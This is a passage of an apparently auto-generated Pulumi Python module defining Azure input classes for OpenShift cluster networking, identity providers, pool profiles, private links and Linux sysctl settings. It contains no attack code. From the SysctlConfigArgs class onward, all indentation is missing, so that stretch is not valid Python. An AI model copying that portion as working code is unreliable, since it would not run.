                 vnet_id: Optional[pulumi.Input[str]] = None):
        """
        Represents the OpenShift networking configuration
        :param pulumi.Input[str] peer_vnet_id: CIDR of the Vnet to peer.
        :param pulumi.Input[str] vnet_cidr: CIDR for the OpenShift Vnet.
        :param pulumi.Input[str] vnet_id: ID of the Vnet created for OSA cluster.
        """
        if peer_vnet_id is not None:
            pulumi.set(__self__, "peer_vnet_id", peer_vnet_id)
        # After defaulting, vnet_cidr is never None; the original's extra
        # `is not None` guard was dead code, so the value is set directly.
        if vnet_cidr is None:
            vnet_cidr = '10.0.0.0/8'
        pulumi.set(__self__, "vnet_cidr", vnet_cidr)
        if vnet_id is not None:
            pulumi.set(__self__, "vnet_id", vnet_id)

    @property
    @pulumi.getter(name="peerVnetId")
    def peer_vnet_id(self) -> Optional[pulumi.Input[str]]:
        """
        CIDR of the Vnet to peer.
        """
        return pulumi.get(self, "peer_vnet_id")

    @peer_vnet_id.setter
    def peer_vnet_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "peer_vnet_id", value)

    @property
    @pulumi.getter(name="vnetCidr")
    def vnet_cidr(self) -> Optional[pulumi.Input[str]]:
        """
        CIDR for the OpenShift Vnet.
        """
        return pulumi.get(self, "vnet_cidr")

    @vnet_cidr.setter
    def vnet_cidr(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "vnet_cidr", value)

    @property
    @pulumi.getter(name="vnetId")
    def vnet_id(self) -> Optional[pulumi.Input[str]]:
        """
        ID of the Vnet created for OSA cluster.
        """
        return pulumi.get(self, "vnet_id")

    @vnet_id.setter
    def vnet_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "vnet_id", value)
@pulumi.input_type
class OpenShiftManagedClusterAADIdentityProviderArgs:
    def __init__(__self__, *,
                 kind: pulumi.Input[str],
                 client_id: Optional[pulumi.Input[str]] = None,
                 customer_admin_group_id: Optional[pulumi.Input[str]] = None,
                 secret: Optional[pulumi.Input[str]] = None,
                 tenant_id: Optional[pulumi.Input[str]] = None):
        """
        Defines the Identity provider for MS AAD.
        :param pulumi.Input[str] kind: The kind of the provider.
               Expected value is 'AADIdentityProvider'.
        :param pulumi.Input[str] client_id: The clientId password associated with the provider.
        :param pulumi.Input[str] customer_admin_group_id: The groupId to be granted cluster admin role.
        :param pulumi.Input[str] secret: The secret password associated with the provider.
        :param pulumi.Input[str] tenant_id: The tenantId associated with the provider.
        """
        # The discriminator is forced to the literal value; the `kind`
        # argument itself is accepted but not stored.
        pulumi.set(__self__, "kind", 'AADIdentityProvider')
        for _key, _val in (("client_id", client_id),
                           ("customer_admin_group_id", customer_admin_group_id),
                           ("secret", secret),
                           ("tenant_id", tenant_id)):
            if _val is not None:
                pulumi.set(__self__, _key, _val)

    @property
    @pulumi.getter
    def kind(self) -> pulumi.Input[str]:
        """
        The provider's kind.
        Expected value is 'AADIdentityProvider'.
        """
        return pulumi.get(self, "kind")

    @kind.setter
    def kind(self, value: pulumi.Input[str]):
        pulumi.set(self, "kind", value)

    @property
    @pulumi.getter(name="clientId")
    def client_id(self) -> Optional[pulumi.Input[str]]:
        """
        The clientId password associated with the provider.
        """
        return pulumi.get(self, "client_id")

    @client_id.setter
    def client_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "client_id", value)

    @property
    @pulumi.getter(name="customerAdminGroupId")
    def customer_admin_group_id(self) -> Optional[pulumi.Input[str]]:
        """
        The groupId granted the cluster admin role.
        """
        return pulumi.get(self, "customer_admin_group_id")

    @customer_admin_group_id.setter
    def customer_admin_group_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "customer_admin_group_id", value)

    @property
    @pulumi.getter
    def secret(self) -> Optional[pulumi.Input[str]]:
        """
        The secret password associated with the provider.
        """
        return pulumi.get(self, "secret")

    @secret.setter
    def secret(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "secret", value)

    @property
    @pulumi.getter(name="tenantId")
    def tenant_id(self) -> Optional[pulumi.Input[str]]:
        """
        The tenantId associated with the provider.
        """
        return pulumi.get(self, "tenant_id")

    @tenant_id.setter
    def tenant_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "tenant_id", value)
@pulumi.input_type
class OpenShiftManagedClusterAgentPoolProfileArgs:
    def __init__(__self__, *,
                 count: pulumi.Input[int],
                 name: pulumi.Input[str],
                 vm_size: pulumi.Input[Union[str, 'OpenShiftContainerServiceVMSize']],
                 os_type: Optional[pulumi.Input[Union[str, 'OSType']]] = None,
                 role: Optional[pulumi.Input[Union[str, 'OpenShiftAgentPoolProfileRole']]] = None,
                 subnet_cidr: Optional[pulumi.Input[str]] = None):
        """
        Defines the configuration of the OpenShift cluster VMs.
        :param pulumi.Input[int] count: Number of agents (VMs) to host docker containers.
        :param pulumi.Input[str] name: Unique name of the pool profile in the context of the subscription and resource group.
        :param pulumi.Input[Union[str, 'OpenShiftContainerServiceVMSize']] vm_size: Size of agent VMs.
        :param pulumi.Input[Union[str, 'OSType']] os_type: OsType to be used to specify os type. Choose from Linux and Windows. Default to Linux.
        :param pulumi.Input[Union[str, 'OpenShiftAgentPoolProfileRole']] role: Define the role of the AgentPoolProfile.
        :param pulumi.Input[str] subnet_cidr: Subnet CIDR for the peering. Defaults to '10.0.0.0/24' when omitted.
        """
        pulumi.set(__self__, "count", count)
        pulumi.set(__self__, "name", name)
        pulumi.set(__self__, "vm_size", vm_size)
        if os_type is not None:
            pulumi.set(__self__, "os_type", os_type)
        if role is not None:
            pulumi.set(__self__, "role", role)
        # subnet_cidr is always recorded: fall back to the service default
        # when the caller omits it. (The generated original re-checked for
        # None after defaulting, which was unreachable; the dead check is
        # collapsed here — behavior is unchanged.)
        if subnet_cidr is None:
            subnet_cidr = '10.0.0.0/24'
        pulumi.set(__self__, "subnet_cidr", subnet_cidr)
    @property
    @pulumi.getter
    def count(self) -> pulumi.Input[int]:
        """
        Number of agents (VMs) to host docker containers.
        """
        return pulumi.get(self, "count")
    @count.setter
    def count(self, value: pulumi.Input[int]):
        pulumi.set(self, "count", value)
    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """
        Unique name of the pool profile in the context of the subscription and resource group.
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter(name="vmSize")
    def vm_size(self) -> pulumi.Input[Union[str, 'OpenShiftContainerServiceVMSize']]:
        """
        Size of agent VMs.
        """
        return pulumi.get(self, "vm_size")
    @vm_size.setter
    def vm_size(self, value: pulumi.Input[Union[str, 'OpenShiftContainerServiceVMSize']]):
        pulumi.set(self, "vm_size", value)
    @property
    @pulumi.getter(name="osType")
    def os_type(self) -> Optional[pulumi.Input[Union[str, 'OSType']]]:
        """
        OsType to be used to specify os type. Choose from Linux and Windows. Default to Linux.
        """
        return pulumi.get(self, "os_type")
    @os_type.setter
    def os_type(self, value: Optional[pulumi.Input[Union[str, 'OSType']]]):
        pulumi.set(self, "os_type", value)
    @property
    @pulumi.getter
    def role(self) -> Optional[pulumi.Input[Union[str, 'OpenShiftAgentPoolProfileRole']]]:
        """
        Define the role of the AgentPoolProfile.
        """
        return pulumi.get(self, "role")
    @role.setter
    def role(self, value: Optional[pulumi.Input[Union[str, 'OpenShiftAgentPoolProfileRole']]]):
        pulumi.set(self, "role", value)
    @property
    @pulumi.getter(name="subnetCidr")
    def subnet_cidr(self) -> Optional[pulumi.Input[str]]:
        """
        Subnet CIDR for the peering.
        """
        return pulumi.get(self, "subnet_cidr")
    @subnet_cidr.setter
    def subnet_cidr(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "subnet_cidr", value)
@pulumi.input_type
class OpenShiftManagedClusterAuthProfileArgs:
    def __init__(__self__, *,
                 identity_providers: Optional[pulumi.Input[Sequence[pulumi.Input['OpenShiftManagedClusterIdentityProviderArgs']]]] = None):
        """
        All possible authentication profiles for the OpenShift cluster.

        :param pulumi.Input[Sequence[pulumi.Input['OpenShiftManagedClusterIdentityProviderArgs']]] identity_providers: Type of authentication profile to use.
        """
        # Only record the field when it was actually supplied.
        if identity_providers is None:
            return
        pulumi.set(__self__, "identity_providers", identity_providers)
    @property
    @pulumi.getter(name="identityProviders")
    def identity_providers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OpenShiftManagedClusterIdentityProviderArgs']]]]:
        """
        Type of authentication profile to use.
        """
        return pulumi.get(self, "identity_providers")
    @identity_providers.setter
    def identity_providers(self, new_value: Optional[pulumi.Input[Sequence[pulumi.Input['OpenShiftManagedClusterIdentityProviderArgs']]]]):
        pulumi.set(self, "identity_providers", new_value)
@pulumi.input_type
class OpenShiftManagedClusterIdentityProviderArgs:
    def __init__(__self__, *,
                 name: Optional[pulumi.Input[str]] = None,
                 provider: Optional[pulumi.Input['OpenShiftManagedClusterAADIdentityProviderArgs']] = None):
        """
        Configuration of an identity provider used by the OpenShift cluster.

        :param pulumi.Input[str] name: Name of the provider.
        :param pulumi.Input['OpenShiftManagedClusterAADIdentityProviderArgs'] provider: Configuration of the provider.
        """
        # Record only the fields the caller supplied.
        for field_name, field_value in (("name", name), ("provider", provider)):
            if field_value is not None:
                pulumi.set(__self__, field_name, field_value)
    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Name of the provider.
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, new_value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", new_value)
    @property
    @pulumi.getter
    def provider(self) -> Optional[pulumi.Input['OpenShiftManagedClusterAADIdentityProviderArgs']]:
        """
        Configuration of the provider.
        """
        return pulumi.get(self, "provider")
    @provider.setter
    def provider(self, new_value: Optional[pulumi.Input['OpenShiftManagedClusterAADIdentityProviderArgs']]):
        pulumi.set(self, "provider", new_value)
@pulumi.input_type
class OpenShiftManagedClusterMasterPoolProfileArgs:
    def __init__(__self__, *,
                 count: pulumi.Input[int],
                 vm_size: pulumi.Input[Union[str, 'OpenShiftContainerServiceVMSize']],
                 name: Optional[pulumi.Input[str]] = None,
                 os_type: Optional[pulumi.Input[Union[str, 'OSType']]] = None,
                 subnet_cidr: Optional[pulumi.Input[str]] = None):
        """
        Configuration for the OpenShift master VMs
        (OpenShiftManagedClusterMaterPoolProfile).

        :param pulumi.Input[int] count: Number of masters (VMs) to host docker containers. The default value is 3.
        :param pulumi.Input[Union[str, 'OpenShiftContainerServiceVMSize']] vm_size: Size of agent VMs.
        :param pulumi.Input[str] name: Unique name of the master pool profile in the context of the subscription and resource group.
        :param pulumi.Input[Union[str, 'OSType']] os_type: OsType to be used to specify os type. Choose from Linux and Windows. Default to Linux.
        :param pulumi.Input[str] subnet_cidr: Subnet CIDR for the peering.
        """
        # Required fields are always recorded.
        pulumi.set(__self__, "count", count)
        pulumi.set(__self__, "vm_size", vm_size)
        # Optional fields are recorded only when supplied.
        for field_name, field_value in (
                ("name", name),
                ("os_type", os_type),
                ("subnet_cidr", subnet_cidr)):
            if field_value is not None:
                pulumi.set(__self__, field_name, field_value)
    @property
    @pulumi.getter
    def count(self) -> pulumi.Input[int]:
        """
        Number of masters (VMs) to host docker containers. The default value is 3.
        """
        return pulumi.get(self, "count")
    @count.setter
    def count(self, new_value: pulumi.Input[int]):
        pulumi.set(self, "count", new_value)
    @property
    @pulumi.getter(name="vmSize")
    def vm_size(self) -> pulumi.Input[Union[str, 'OpenShiftContainerServiceVMSize']]:
        """
        Size of agent VMs.
        """
        return pulumi.get(self, "vm_size")
    @vm_size.setter
    def vm_size(self, new_value: pulumi.Input[Union[str, 'OpenShiftContainerServiceVMSize']]):
        pulumi.set(self, "vm_size", new_value)
    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Unique name of the master pool profile in the context of the subscription and resource group.
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, new_value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", new_value)
    @property
    @pulumi.getter(name="osType")
    def os_type(self) -> Optional[pulumi.Input[Union[str, 'OSType']]]:
        """
        OsType to be used to specify os type. Choose from Linux and Windows. Default to Linux.
        """
        return pulumi.get(self, "os_type")
    @os_type.setter
    def os_type(self, new_value: Optional[pulumi.Input[Union[str, 'OSType']]]):
        pulumi.set(self, "os_type", new_value)
    @property
    @pulumi.getter(name="subnetCidr")
    def subnet_cidr(self) -> Optional[pulumi.Input[str]]:
        """
        Subnet CIDR for the peering.
        """
        return pulumi.get(self, "subnet_cidr")
    @subnet_cidr.setter
    def subnet_cidr(self, new_value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "subnet_cidr", new_value)
@pulumi.input_type
class OpenShiftRouterProfileArgs:
    def __init__(__self__, *,
                 name: Optional[pulumi.Input[str]] = None):
        """
        An OpenShift router.

        :param pulumi.Input[str] name: Name of the router profile.
        """
        # Record the name only when the caller supplied one.
        if name is None:
            return
        pulumi.set(__self__, "name", name)
    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Name of the router profile.
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, new_value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", new_value)
@pulumi.input_type
class PrivateEndpointArgs:
    def __init__(__self__, *,
                 id: Optional[pulumi.Input[str]] = None):
        """
        Private endpoint which a connection belongs to.

        :param pulumi.Input[str] id: The resource Id for private endpoint
        """
        # Record the id only when the caller supplied one.
        if id is None:
            return
        pulumi.set(__self__, "id", id)
    @property
    @pulumi.getter
    def id(self) -> Optional[pulumi.Input[str]]:
        """
        The resource Id for private endpoint
        """
        return pulumi.get(self, "id")
    @id.setter
    def id(self, new_value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "id", new_value)
@pulumi.input_type
class PrivateLinkResourceArgs:
    def __init__(__self__, *,
                 group_id: Optional[pulumi.Input[str]] = None,
                 id: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 required_members: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 type: Optional[pulumi.Input[str]] = None):
        """
        A private link resource.

        :param pulumi.Input[str] group_id: The group ID of the resource.
        :param pulumi.Input[str] id: The ID of the private link resource.
        :param pulumi.Input[str] name: The name of the private link resource.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] required_members: RequiredMembers of the resource
        :param pulumi.Input[str] type: The resource type.
        """
        # Every field is optional; record only those the caller supplied.
        for field_name, field_value in (
                ("group_id", group_id),
                ("id", id),
                ("name", name),
                ("required_members", required_members),
                ("type", type)):
            if field_value is not None:
                pulumi.set(__self__, field_name, field_value)
    @property
    @pulumi.getter(name="groupId")
    def group_id(self) -> Optional[pulumi.Input[str]]:
        """
        The group ID of the resource.
        """
        return pulumi.get(self, "group_id")
    @group_id.setter
    def group_id(self, new_value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "group_id", new_value)
    @property
    @pulumi.getter
    def id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the private link resource.
        """
        return pulumi.get(self, "id")
    @id.setter
    def id(self, new_value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "id", new_value)
    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the private link resource.
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, new_value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", new_value)
    @property
    @pulumi.getter(name="requiredMembers")
    def required_members(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        RequiredMembers of the resource
        """
        return pulumi.get(self, "required_members")
    @required_members.setter
    def required_members(self, new_value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "required_members", new_value)
    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        """
        The resource type.
        """
        return pulumi.get(self, "type")
    @type.setter
    def type(self, new_value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "type", new_value)
@pulumi.input_type
class PrivateLinkServiceConnectionStateArgs:
    def __init__(__self__, *,
                 description: Optional[pulumi.Input[str]] = None,
                 status: Optional[pulumi.Input[Union[str, 'ConnectionStatus']]] = None):
        """
        State of a private link service connection.

        :param pulumi.Input[str] description: The private link service connection description.
        :param pulumi.Input[Union[str, 'ConnectionStatus']] status: The private link service connection status.
        """
        # Record only the fields the caller supplied.
        for field_name, field_value in (("description", description), ("status", status)):
            if field_value is not None:
                pulumi.set(__self__, field_name, field_value)
    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        The private link service connection description.
        """
        return pulumi.get(self, "description")
    @description.setter
    def description(self, new_value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", new_value)
    @property
    @pulumi.getter
    def status(self) -> Optional[pulumi.Input[Union[str, 'ConnectionStatus']]]:
        """
        The private link service connection status.
        """
        return pulumi.get(self, "status")
    @status.setter
    def status(self, new_value: Optional[pulumi.Input[Union[str, 'ConnectionStatus']]]):
        pulumi.set(self, "status", new_value)
@pulumi.input_type
class PurchasePlanArgs:
    def __init__(__self__, *,
                 name: Optional[pulumi.Input[str]] = None,
                 product: Optional[pulumi.Input[str]] = None,
                 promotion_code: Optional[pulumi.Input[str]] = None,
                 publisher: Optional[pulumi.Input[str]] = None):
        """
        Used for establishing the purchase context of any 3rd Party artifact through MarketPlace.
        :param pulumi.Input[str] name: The plan ID.
        :param pulumi.Input[str] product: Specifies the product of the image from the marketplace. This is the same value as Offer under the imageReference element.
        :param pulumi.Input[str] promotion_code: The promotion code.
        :param pulumi.Input[str] publisher: The publisher ID.
        """
        if name is not None:
            pulumi.set(__self__, "name", name)
        if product is not None:
            pulumi.set(__self__, "product", product)
        if promotion_code is not None:
            pulumi.set(__self__, "promotion_code", promotion_code)
        if publisher is not None:
            pulumi.set(__self__, "publisher", publisher)
    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The plan ID.
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter
    def product(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the product of the image from the marketplace. This is the same value as Offer under the imageReference element.
        """
        return pulumi.get(self, "product")
    @product.setter
    def product(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "product", value)
    @property
    @pulumi.getter(name="promotionCode")
    def promotion_code(self) -> Optional[pulumi.Input[str]]:
        """
        The promotion code.
        """
        return pulumi.get(self, "promotion_code")
    @promotion_code.setter
    def promotion_code(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "promotion_code", value)
    @property
    @pulumi.getter
    def publisher(self) -> Optional[pulumi.Input[str]]:
        """
        The publisher ID.
        """
        return pulumi.get(self, "publisher")
    @publisher.setter
    def publisher(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "publisher", value)
@pulumi.input_type
class ResourceReferenceArgs:
    def __init__(__self__, *,
                 id: Optional[pulumi.Input[str]] = None):
        """
        A reference to an Azure resource.

        :param pulumi.Input[str] id: The fully qualified Azure resource id.
        """
        # Record the id only when the caller supplied one.
        if id is None:
            return
        pulumi.set(__self__, "id", id)
    @property
    @pulumi.getter
    def id(self) -> Optional[pulumi.Input[str]]:
        """
        The fully qualified Azure resource id.
        """
        return pulumi.get(self, "id")
    @id.setter
    def id(self, new_value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "id", new_value)
@pulumi.input_type
class SysctlConfigArgs:
def __init__(__self__, *,
fs_aio_max_nr: Optional[pulumi.Input[int]] = None,
fs_file_max: Optional[pulumi.Input[int]] = None,
fs_inotify_max_user_watches: Optional[pulumi.Input[int]] = None,
fs_nr_open: Optional[pulumi.Input[int]] = None,
kernel_threads_max: Optional[pulumi.Input[int]] = None,
net_core_netdev_max_backlog: Optional[pulumi.Input[int]] = None,
net_core_optmem_max: Optional[pulumi.Input[int]] = None,
net_core_rmem_default: Optional[pulumi.Input[int]] = None,
net_core_rmem_max: Optional[pulumi.Input[int]] = None,
net_core_somaxconn: Optional[pulumi.Input[int]] = None,
net_core_wmem_default: Optional[pulumi.Input[int]] = None,
net_core_wmem_max: Optional[pulumi.Input[int]] = None,
net_ipv4_ip_local_port_range: Optional[pulumi.Input[str]] = None,
net_ipv4_neigh_default_gc_thresh1: Optional[pulumi.Input[int]] = None,
net_ipv4_neigh_default_gc_thresh2: Optional[pulumi.Input[int]] = None,
net_ipv4_neigh_default_gc_thresh3: Optional[pulumi.Input[int]] = None,
net_ipv4_tcp_fin_timeout: Optional[pulumi.Input[int]] = None,
net_ipv4_tcp_keepalive_probes: Optional[pulumi.Input[int]] = None,
net_ipv4_tcp_keepalive_time: Optional[pulumi.Input[int]] = None,
net_ipv4_tcp_max_syn_backlog: Optional[pulumi.Input[int]] = None,
net_ipv4_tcp_max_tw_buckets: Optional[pulumi.Input[int]] = None,
net_ipv4_tcp_tw_reuse: Optional[pulumi.Input[bool]] = None,
net_ipv4_tcpkeepalive_intvl: Optional[pulumi.Input[int]] = None,
net_netfilter_nf_conntrack_buckets: Optional[pulumi.Input[int]] = None,
net_netfilter_nf_conntrack_max: Optional[pulumi.Input[int]] = None,
vm_max_map_count: Optional[pulumi.Input[int]] = None,
vm_swappiness: Optional[pulumi.Input[int]] = None,
vm_vfs_cache_pressure: Optional[pulumi.Input[int]] = None):
"""
Sysctl settings for Linux agent nodes.
:param pulumi.Input[int] fs_aio_max_nr: Sysctl setting fs.aio-max-nr.
:param pulumi.Input[int] fs_file_max: Sysctl setting fs.file-max.
:param pulumi.Input[int] fs_inotify_max_user_watches: Sysctl setting fs.inotify.max_user_watches.
:param pulumi.Input[int] fs_nr_open: Sysctl setting fs.nr_open.
:param pulumi.Input[int] kernel_threads_max: Sysctl setting kernel.threads-max.
:param pulumi.Input[int] net_core_netdev_max_backlog: Sysctl setting net.core.netdev_max_backlog.
:param pulumi.Input[int] net_core_optmem_max: Sysctl setting net.core.optmem_max.
:param pulumi.Input[int] net_core_rmem_default: Sysctl setting net.core.rmem_default.
:param pulumi.Input[int] net_core_rmem_max: Sysctl setting net.core.rmem_max.
:param pulumi.Input[int] net_core_somaxconn: Sysctl setting net.core.somaxconn.
:param pulumi.Input[int] net_core_wmem_default: Sysctl setting net.core.wmem_default.
:param pulumi.Input[int] net_core_wmem_max: Sysctl setting net.core.wmem_max.
:param pulumi.Input[str] net_ipv4_ip_local_port_range: Sysctl setting net.ipv4.ip_local_port_range.
:param pulumi.Input[int] net_ipv4_neigh_default_gc_thresh1: Sysctl setting net.ipv4.neigh.default.gc_thresh1.
:param pulumi.Input[int] net_ipv4_neigh_default_gc_thresh2: Sysctl setting net.ipv4.neigh.default.gc_thresh2.
:param pulumi.Input[int] net_ipv4_neigh_default_gc_thresh3: Sysctl setting net.ipv4.neigh.default.gc_thresh3.
:param pulumi.Input[int] net_ipv4_tcp_fin_timeout: Sysctl setting net.ipv4.tcp_fin_timeout.
:param pulumi.Input[int] net_ipv4_tcp_keepalive_probes: Sysctl setting net.ipv4.tcp_keepalive_probes.
:param pulumi.Input[int] net_ipv4_tcp_keepalive_time: Sysctl setting net.ipv4.tcp_keepalive_time.
:param pulumi.Input[int] net_ipv4_tcp_max_syn_backlog: Sysctl setting net.ipv4.tcp_max_syn_backlog.
:param pulumi.Input[int] net_ipv4_tcp_max_tw_buckets: Sysctl setting net.ipv4.tcp_max_tw_buckets.
:param pulumi.Input[bool] net_ipv4_tcp_tw_reuse: Sysctl setting net.ipv4.tcp_tw_reuse.
:param pulumi.Input[int] net_ipv4_tcpkeepalive_intvl: Sysctl setting net.ipv4.tcp_keepalive_intvl.
:param pulumi.Input[int] net_netfilter_nf_conntrack_buckets: Sysctl setting net.netfilter.nf_conntrack_buckets.
:param pulumi.Input[int] net_netfilter_nf_conntrack_max: Sysctl setting net.netfilter.nf_conntrack_max.
:param pulumi.Input[int] vm_max_map_count: Sysctl setting vm.max_map_count.
:param pulumi.Input[int] vm_swappiness: Sysctl setting vm.swappiness.
:param pulumi.Input[int] vm_vfs_cache_pressure: Sysctl setting vm.vfs_cache_pressure.
"""
if fs_aio_max_nr is not None:
pulumi.set(__self__, "fs_aio_max_nr", fs_aio_max_nr)
if fs_file_max is not None:
pulumi.set(__self__, "fs_file_max", fs_file_max)
if fs_inotify_max_user_watches is not None:
pulumi.set(__self__, "fs_inotify_max_user_watches", fs_inotify_max_user_watches)
if fs_nr_open is not None:
pulumi.set(__self__, "fs_nr_open", fs_nr_open)
if kernel_threads_max is not None:
pulumi.set(__self__, "kernel_threads_max", kernel_threads_max)
if net_core_netdev_max_backlog is not None:
pulumi.set(__self__, "net_core_netdev_max_backlog", net_core_netdev_max_backlog)
if net_core_optmem_max is not None:
pulumi.set(__self__, "net_core_optmem_max", net_core_optmem_max)
if net_core_rmem_default is not None:
pulumi.set(__self__, "net_core_rmem_default", net_core_rmem_default)
if net_core_rmem_max is not None:
pulumi.set(__self__, "net_core_rmem_max", net_core_rmem_max)
if net_core_somaxconn is not None:
pulumi.set(__self__, "net_core_somaxconn", net_core_somaxconn)
if net_core_wmem_default is not None:
pulumi.set(__self__, "net_core_wmem_default", net_core_wmem_default)
if net_core_wmem_max is not None:
pulumi.set(__self__, "net_core_wmem_max", net_core_wmem_max)
if net_ipv4_ip_local_port_range is not None:
pulumi.set(__self__, "net_ipv4_ip_local_port_range", net_ipv4_ip_local_port_range)
if net_ipv4_neigh_default_gc_thresh1 is not None:
pulumi.set(__self__, "net_ipv4_neigh_default_gc_thresh1", net_ipv4_neigh_default_gc_thresh1)
if net_ipv4_neigh_default_gc_thresh2 is not None:
pulumi.set(__self__, "net_ipv4_neigh_default_gc_thresh2", net_ipv4_neigh_default_gc_thresh2)
if net_ipv4_neigh_default_gc_thresh3 is not None:
pulumi.set(__self__, "net_ipv4_neigh_default_gc_thresh3", net_ipv4_neigh_default_gc_thresh3)
if net_ipv4_tcp_fin_timeout is not None:
pulumi.set(__self__, "net_ipv4_tcp_fin_timeout", net_ipv4_tcp_fin_timeout)
if net_ipv4_tcp_keepalive_probes is not None:
pulumi.set(__self__, "net_ipv4_tcp_keepalive_probes", net_ipv4_tcp_keepalive_probes)
if net_ipv4_tcp_keepalive_time is not None:
pulumi.set(__self__, "net_ipv4_tcp_keepalive_time", net_ipv4_tcp_keepalive_time)
if net_ipv4_tcp_max_syn_backlog is not None:
pulumi.set(__self__, "net_ipv4_tcp_max_syn_backlog", net_ipv4_tcp_max_syn_backlog)
if net_ipv4_tcp_max_tw_buckets is not None:
pulumi.set(__self__, "net_ipv4_tcp_max_tw_buckets", net_ipv4_tcp_max_tw_buckets)
if net_ipv4_tcp_tw_reuse is not None:
pulumi.set(__self__, "net_ipv4_tcp_tw_reuse", net_ipv4_tcp_tw_reuse)
if net_ipv4_tcpkeepalive_intvl is not None:
pulumi.set(__self__, "net_ipv4_tcpkeepalive_intvl", net_ipv4_tcpkeepalive_intvl)
if net_netfilter_nf_conntrack_buckets is not None:
pulumi.set(__self__, "net_netfilter_nf_conntrack_buckets", net_netfilter_nf_conntrack_buckets)
if net_netfilter_nf_conntrack_max is not None:
pulumi.set(__self__, "net_netfilter_nf_conntrack_max", net_netfilter_nf_conntrack_max)
if vm_max_map_count is not None:
pulumi.set(__self__, "vm_max_map_count", vm_max_map_count)
if vm_swappiness is not None:
pulumi.set(__self__, "vm_swappiness", vm_swappiness)
if vm_vfs_cache_pressure is not None:
pulumi.set(__self__, "vm_vfs_cache_pressure", vm_vfs_cache_pressure)
@property
@pulumi.getter(name="fsAioMaxNr")
def fs_aio_max_nr(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting fs.aio-max-nr.
"""
return pulumi.get(self, "fs_aio_max_nr")
@fs_aio_max_nr.setter
def fs_aio_max_nr(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "fs_aio_max_nr", value)
@property
@pulumi.getter(name="fsFileMax")
def fs_file_max(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting fs.file-max.
"""
return pulumi.get(self, "fs_file_max")
@fs_file_max.setter
def fs_file_max(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "fs_file_max", value)
@property
@pulumi.getter(name="fsInotifyMaxUserWatches")
def fs_inotify_max_user_watches(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting fs.inotify.max_user_watches.
"""
return pulumi.get(self, "fs_inotify_max_user_watches")
@fs_inotify_max_user_watches.setter
def fs_inotify_max_user_watches(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "fs_inotify_max_user_watches", value)
@property
@pulumi.getter(name="fsNrOpen")
def fs_nr_open(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting fs.nr_open.
"""
return pulumi.get(self, "fs_nr_open")
@fs_nr_open.setter
def fs_nr_open(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "fs_nr_open", value)
@property
@pulumi.getter(name="kernelThreadsMax")
def kernel_threads_max(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting kernel.threads-max.
"""
return pulumi.get(self, "kernel_threads_max")
@kernel_threads_max.setter
def kernel_threads_max(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "kernel_threads_max", value)
@property
@pulumi.getter(name="netCoreNetdevMaxBacklog")
def net_core_netdev_max_backlog(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting net.core.netdev_max_backlog.
"""
return pulumi.get(self, "net_core_netdev_max_backlog")
@net_core_netdev_max_backlog.setter
def net_core_netdev_max_backlog(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "net_core_netdev_max_backlog", value)
@property
@pulumi.getter(name="netCoreOptmemMax")
def net_core_optmem_max(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting net.core.optmem_max.
